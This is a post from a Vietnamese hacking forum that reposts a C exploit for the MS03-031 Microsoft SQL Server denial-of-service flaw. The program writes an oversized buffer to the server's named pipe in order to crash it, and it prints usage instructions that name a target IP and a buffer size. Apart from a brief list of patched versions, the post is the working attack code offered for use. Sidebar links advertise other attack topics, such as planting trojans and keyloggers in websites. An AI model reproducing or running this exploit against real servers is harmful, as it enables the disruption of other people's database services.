HACKIS - Hacking Internet Security
Would you like to react to this message? Create an account in a few clicks or log in to continue.
Search
 
 

Display results as :
 


Rechercher Advanced Search

Latest topics
» Tuyệt Kỹ Đong Giai Chân Kinh (tuyệt Kỹ cua trai)
Code làm tê liệt các máy chủ dùng MSSQL Server EmptyThu Aug 23, 2012 5:38 am by Admin

» Tuyệt kỹ cua giai
Code làm tê liệt các máy chủ dùng MSSQL Server EmptyThu Aug 23, 2012 5:36 am by Admin

» NETCAT.........
Code làm tê liệt các máy chủ dùng MSSQL Server EmptyMon Aug 13, 2012 6:35 am by Admin

» Bảo mật CSDL bằng phương pháp mã hóa.
Code làm tê liệt các máy chủ dùng MSSQL Server EmptyTue Apr 17, 2012 10:04 pm by Admin

» Hàm mã hóa MD5 bằng JavaScript
Code làm tê liệt các máy chủ dùng MSSQL Server EmptyTue Apr 17, 2012 10:03 pm by Admin

» Giá của món quà
Code làm tê liệt các máy chủ dùng MSSQL Server EmptyFri Apr 13, 2012 6:01 am by Admin

» Sẽ chỉ yêu ai?
Code làm tê liệt các máy chủ dùng MSSQL Server EmptyFri Apr 13, 2012 6:01 am by Admin

» Cách đọc bảng chữ cái!
Code làm tê liệt các máy chủ dùng MSSQL Server EmptyThu Apr 12, 2012 10:37 pm by Admin

» Gắn trojan, keylog, virus vào website, forum
Code làm tê liệt các máy chủ dùng MSSQL Server EmptyTue Apr 10, 2012 1:14 am by Admin

Affiliates
free forum


Code làm tê liệt các máy chủ dùng MSSQL Server

Go down

Code làm tê liệt các máy chủ dùng MSSQL Server Empty Code làm tê liệt các máy chủ dùng MSSQL Server

Post  Admin Wed Mar 28, 2012 11:34 pm


////////////////////////////////////////////////////////////////////////////////
//
// exp for Microsoft SQL Server DoS(MS03-031)
//
// By : refdom
// Email : refdom@xfocus.org
// Home Page : http://www.xfocus.org
// http://www.xfocus.org/exploits/200307/expMS0331.cpp
////////////////////////////////////////////////////////////////////////////////

#include
#include
#include


void Usage()
{
printf("******************************************\n");
printf("exp for Microsoft SQL Server DoS(MS03-031)\n\n");
printf("\t Written by Refdom\n");
printf("\t Email: refdom@xfocus.org\n");
printf("\t Homepage: www.xfocus.org\n\n");
printf("Usage: DOSMSSQL.exe server buffersize\n");
printf("eg: DOSMSSQL.exe192.168.0.1 9000\n\n");
printf("The buffersize depends on service pack level.\n");
printf("I test it on my server: windows 2000, mssqlserver no sp.\n");
printf("when buffersize is 9000, the server can be crashed.\n");
printf("\n");
printf("*******************************************\n\n");
}


int main(int argc, char* argv[])
{
char lpPipeName[50];
char *lpBuffer = NULL;
unsigned long ulSize = 0;

BOOL bResult;
DWORD dwWritten = 0, dwMode;
HANDLE hPipe;

Usage();

printf("Starting...\n");

if (argc != 3)
goto Exit0;

if (strlen(argv[1]) < 20)
{
sprintf(lpPipeName, "\\\\%s\\\\.\\pipe\\sql\\query", argv[1]);
}
else
{
printf("Error!server\n");
goto Exit0;
}

ulSize= atol(argv[2]);

lpBuffer = (char*)malloc(ulSize + 2);
if (NULL == lpBuffer)
{
printf("malloc error!\n");
goto Exit0;
}

memset(lpBuffer, 0, ulSize + 2);
memset(lpBuffer, 'A', ulSize);
*lpBuffer = '\x12';
*(lpBuffer + 1) = '\x01';
*(lpBuffer + 2) = '\x00';

printf("Connecting Server...\n");

hPipe = CreateFile(lpPipeName,
GENERIC_READ | GENERIC_WRITE,
0,
NULL,
OPEN_EXISTING,
0,
NULL);
if (INVALID_HANDLE_VALUE == hPipe)
{
printf("Error!Connect server!%d\n", GetLastError());
goto Exit0;
}

dwMode = PIPE_READMODE_MESSAGE;
bResult = SetNamedPipeHandleState(
hPipe, // pipe handle
&dwMode, // new pipe mode
NULL, // don't set maximum bytes
NULL); // don't set maximum time
if (!bResult)
{
printf("Error!SetNamedPipeHandleState.%d\n", GetLastError());
goto Exit0;
}

bResult = WriteFile(hPipe, lpBuffer, ulSize + 1, &dwWritten, NULL);

if (!bResult)
{
printf("\n\tError!WriteFile.%d\n\n", GetLastError());
printf("When see the error message, the target may be crashed!!\n\n");
goto Exit0;
}

Exit0:

return 0;
}


fix lỗi và download patch tại :
1/Microsoft SQL Server 7.0
2.Microsoft SQL 2000 32-bit Edition
3.Microsoft SQL 2000 64-bit Edition
Admin
Admin
Admin

Tổng số bài gửi : 782
Join date : 2009-08-15

https://hackis.forumvi.com

Back to top Go down

Back to top

- Similar topics

 
Permissions in this forum:
You cannot reply to topics in this forum